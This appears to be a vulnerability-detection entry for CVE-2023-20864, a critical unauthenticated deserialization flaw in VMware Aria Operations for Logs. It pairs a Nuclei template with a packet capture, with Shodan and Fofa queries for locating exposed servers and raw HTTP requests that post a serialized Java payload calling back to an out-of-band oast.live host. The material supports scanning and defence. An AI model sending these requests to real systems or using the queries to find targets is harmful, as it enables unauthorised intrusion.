| Title | VMware Aria Operations for Logs - Unauthenticated Remote Code Execution |
|---|---|
| Author | rootxharsh,iamnoooob,pdresearch |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. |
| Remediation | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.92927 |
| CVE ID | CVE-2023-20864 |
| CWE ID | CWE-502 |
| Shodan Query | title:"vRealize Log Insight"http.title:"vrealize log insight" |
| Fofa Query | title="vrealize log insight" |
| Tags | cve2023 cve vmware aria rce oast vuln |
VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
GET /csrf HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
X-Csrf-Token: Fetch
Accept-Encoding: gzip
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Connection: close
Content-Length: 337
Content-type: application/octet-stream
X-CSRF-Token: NJOdMq
Accept-Encoding: gzip
�� sr java.util.HashMap���`� F
loadFactorI thresholdxp?@ w sr java.net.URL�%76��r I hashCodeI portL authorityt Ljava/lang/String;L fileq ~ L hostq ~ L protocolq ~ L refq ~ xp��������t +d5jki4hle0o11g2pad407ssn6hfuhta46.oast.livet q ~ t httppxt 2http://d5jki4hle0o11g2pad407ssn6hfuhta46.oast.livex
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-20864.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-20864.pcap
N/AN/A